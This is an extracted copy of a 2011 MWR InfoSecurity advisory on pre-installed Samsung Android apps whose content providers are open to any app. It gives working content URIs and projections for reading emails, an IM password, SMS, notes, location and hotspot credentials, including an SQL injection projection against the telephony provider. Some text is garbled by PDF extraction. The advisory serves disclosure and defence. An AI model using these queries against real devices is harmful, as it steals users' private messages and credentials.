Multiple Samsung (Android) Application Vulnerabilities - MWR Labs

Download PDF
1 downloads 200 Views 576KB Size Report
Comment
Dec 13, 2011 - Some of these applications make use of content providers which are ... android:readPermission="com.exampl
PUBLIC

Multiple Samsung (Android) Application Vulnerabilities MWR InfoSecurity Advisory 13/12/2011

Package Name

Multiple pre-installed Samsung applications

Date

13th December 2011 Samsung Galaxy S2 (I9100XWKI4) – Android 2.3.4 Other models running these applications may be affected

Affected Versions CVE Reference

Severity

None Tyrone Erasmus Mike Auty (Channels SQLi) High Risk

Local/Remote

Local

Vulnerability Class

Android Content Providers

Vendor

Samsung Vendor updated all vulnerable software and firmware releases after 13th March 2012 contain the fixes.

Authors

Vendor Response

Description Many Samsung applications are pre-installed by default on Samsung Android devices and these applications cannot be removed by the user. Some of these applications make use of content providers which are implicitly exported by default. This results in these content providers allowing other applications on the device to request sensitive information and successfully obtain it. This is cause for concern as any 3rd party application containing malicious code does not require any granted permissions in order to obtain sensitive information from these applications. It should be noted that only applications disclosing potentially sensitive information are being reported on in this document. The following applications allow the retrieval of sensitive information from their content providers without any granted permissions:

© MWR InfoSecurity

Package

Obtainable Information

Version

com.seven.z7 (Social Hub)

Email address Email password Email contents Instant messages

7.52.10101

com.sec.android.socialhub (Social Hub)

Social networking messages

2.00.00001

1 of 10

PUBLIC

com.sec.android.im (IM)

Instant messages IM contacts

1.00.10201

com.android.providers.telephony (Dialer Storage)

SMS

2.3.4

com.sec.android.provider.logsprovider (LogsProvider)

SMS Email contents Instant messages Social networking messages Call logs

1.0

com.sec.android.widgetapp.weatherclock (AccuWeather.com)

Location

11.06.27.01

com.sec.android.app.minidiary (MiniDiary)

Notes Photo GPS coordinates

1.0

com.sec.android.app.memo (Memo)

Notes

1.0

com.sec.android.widgetapp.postit (Minipaper)

Notes

1.0

com.osp.app.signin (Samsung account)

Encrypted account information

1.0

com.android.providers.settings (Settings Storage)

Portable Wi-Fi hotspot credentials

2.3.4

Impact Malicious applications installed on the same device as the vulnerable applications could steal sensitive information from the user and transmit it back to the attacker.

Cause These vulnerabilities are present because insufficient security permissions are set on the content provider section in each of the vulnerable application’s AndroidManifest.xml file. © MWR InfoSecurity

2 of 10

PUBLIC

Interim Workaround Avoid using the vulnerable applications if you do not have access to the firmware update. To clear information stored in these applications go to Settings->Applications->Manage Applications and press “Clear com.example.app" android:readPermission="com.example.app.provider.permission.READ" android:writePermission="com.example.app.provider.permission.WRITE" />

This means that an application wanting to read or write to this content provider needs to have the stated permissions in order to do so.

© MWR InfoSecurity

3 of 10

PUBLIC

Technical Description The following section will be organised by the information that is obtainable by an unprivileged application. The premise of this section is that an application with no granted permissions can perform a query on the specified content providers in order to obtain the targeted information. When querying a content provider, methods are provided that allows the developer to construct SQL statements. The following is what the query method in Android looks like to a developer: query(uri, projection, selection, selectionArgs, sortOrder)

These parameters get used at various points in a SQL statement to construct the query. This also means that there is often SQL injection vulnerabilities present in these fields on content providers.

Email Package

Information

com.seven.z7 (Social Hub)

Registered user accounts within Social Hub and their associated service.

Uri: content://com.seven.provider.email/accounts Projection: user_name, provision_name Response: user_name | provision_name [email protected] | Yahoo! Messenger [email protected] | Yahoo! Mail

Package

Information

com.seven.z7 (Social Hub)

The password for instant messaging accounts within Social Hub. This password is often the same for the email account and IM account on services like Yahoo and Google.

Uri: content://com.seven.provider.email/dbprefs Response: _id | category | type | key | value | flags ... 242 | Account-6 | 5 | Z7_IM_CLIENT_SETTING_PASSWORD_STRING | Password123 | 0 ...

© MWR InfoSecurity

4 of 10

PUBLIC

Package

Information

com.seven.z7 (Social Hub)

Email messages.

Uri: content://com.seven.provider.email/emails Projection: _id, _from, subject, body Response: _id | _from | subject | body ... 30 | [email protected] | Test subject | Email contents ...

Package

Information

com.sec.android.provider.logsprovider (LogsProvider)

Email messages.

Uri: content://logs/email_seven Projection: messageid, address, m_subject, m_content Response: messageid | address | m_subject | m_content ... 30 | [email protected] | Test subject | Email contents ...

All email accounts registered in Social Hub have their email contents logged. This query to the logs content provider shows the same data as com.seven.provider.email provider except that even if the account gets deregistered or removed from Social Hub, the logs still persist.

Instant Messages Package

Information

com.seven.z7 (Social Hub)

Get all contacts.

Uri: content://com.seven.provider.im/contacts Projection: contact Response: John Paul Susan

© MWR InfoSecurity

5 of 10

PUBLIC

com.seven.z7 (Social Hub)

Get instant messages from Social Hub.

Uri: content://com.seven.provider.im/messages Projection: _id, contact, account, body Response: _id | contact | account | body ... 14 | John | 6 | Hi, how are you? ...

Package

Information

com.sec.android.provider.logsprovider (LogsProvider)

Get the same instant message as above, except from the logs.

Uri: content://logs/im Projection: account_id, name, m_content Response: account_id | buddy_name | message ... 6 | John | Hi, how are you? ...

The logs persist even after an IM account has been deregistered.

Package

Information

com.sec.android.im (IM)

Get the same instant message as above, except from the IM application itself.

Uri: content://com.tecace.app.convprovider Projection: _id, accountId, buddy_name, message Response: _id | accountId | buddy_name | message ... 3 | -1 | null | Hi, how are you? ...

© MWR InfoSecurity

6 of 10

PUBLIC

SMS Package

Information

com.android.providers.telephony (Dialer Storage)

All SMS messages.

Uri: content://channels Projection: * FROM sms;-Response: _id | thread_id | address | person | date | protocol | read | status | type | reply_path_present | subject | body | service_center | locked | error_code | seen | deletable | hidden | group_id | group_type | delivery_date ... 572 | 3 | +27821234567 | null | 1323444871859 | null | 1 | 0 | 2 | null | null | This is a message from me to you | null | 0 | 0 | 1 | 1 | 0 | null | null | 1323444881072 ...

SQL injection exists within the projection and selection parameters for the channels content provider.

Package

Information

com.sec.android.provider.logsprovider (LogsProvider)

First 50 characters of SMS messages.

Uri: content://logs/historys Projection: number, m_content Selection: number like '+%' Response: number | m_content ... +27821234567 | This is a message from me to you ...

© MWR InfoSecurity

7 of 10

PUBLIC

Social Networking Messages Package

Information

com.sec.android.socialhub (Social Hub)

Messages from Social Networks.

Uri: content://com.sec.android.socialhub.unifiedinbox/messages Projection: name,m_subject,m_content Response: name | m_subject | m_content John Smith | Birthday | Are you coming to my party?

Notes Package

Information

com.sec.android.app.minidiary (MiniDiary)

All notes entries, photos and photo locations.

Uri: content://com.sec.android.providers.minidiary.MiniDiaryData/diary Projection: _id, location, date, longitude, latitude, picture_file, note Response: _id | location | date | longitude | latitude | picture_file | note 1 | Germany, Hesse | 2011.01.11 | 9804903 | 51115599 | /data/data/com.sec.android.app.minidiary/files/picture/1323636867660.jpg | Beautiful!

It should also be noted that on Android the contents of the SD card are accessible from any application, allowing applications to retrieve them and upload them to an attacker.

Package

Information

com.sec.android.app.memo (Memo)

User notes stored in this application.

Uri: content://com.samsung.sec.android/memo/all Projection: _id, title, content Response: _id | title | content 1 | 20111211 | Note contents

© MWR InfoSecurity

8 of 10

PUBLIC

Package

Information

com.sec.android.widgetapp.postit (Minipaper)

User notes stored in this application.

Uri: content://com.sec.android.widgetapp.postit/postit Projection: _id, body Response: _id | body 1 | My first postit!

Miscellaneous Package

Information

com.sec.android.socialhub (Social Hub)

Name of the owner of the device.

Uri: content://com.sec.android.socialhub.unifiedinbox/sns_msg_receiver_map Projection: receiver_name Response: Tyrone Erasmus

Package

Information

com.sec.android.widgetapp.weatherclock (AccuWeather.com)

General location of the owner of the device.

Uri: content://com.sec.android.widgetapp.weatherclock Response: NAME | STATE | LOCATION | MAIN_DISPLAY | SUMMER_TIME | LATITUDE | LONGITUDE | PROVIDER Pretoria | Gauteng, South Africa | cityId:305449 | 1 | 0 | -25.7315 | 28.21821 | 0

© MWR InfoSecurity

9 of 10

PUBLIC

Package

Information

com.osp.app.signin (Samsung account)

Obtain encrypted Samsung account settings.

Uri: content://com.osp.contentprovider.ospcontentprovider/identity Response: Value | Key

| | | | | | | |

UserID EmailID Password MobileCountryCode AuthToken AuthTokenSecret BirthDate UserDeviceID

It should be noted that the given above is an encrypted string that has been base64 encoded. If the mechanism that encrypts and decrypts this data is found to be weak, the user’s Samsung account would be compromised.

Package

Information

com.android.providers.settings (Settings Storage)

Portable Wi-Fi hotspot credentials.

Uri: content://settings/secure Response: _id | name | value 2736 | wifi_ap_passwd | h0tsp0tp@ssw0rd ... 2859 | wifi_ap_ssid | Hotspot1234

© MWR InfoSecurity

10 of 10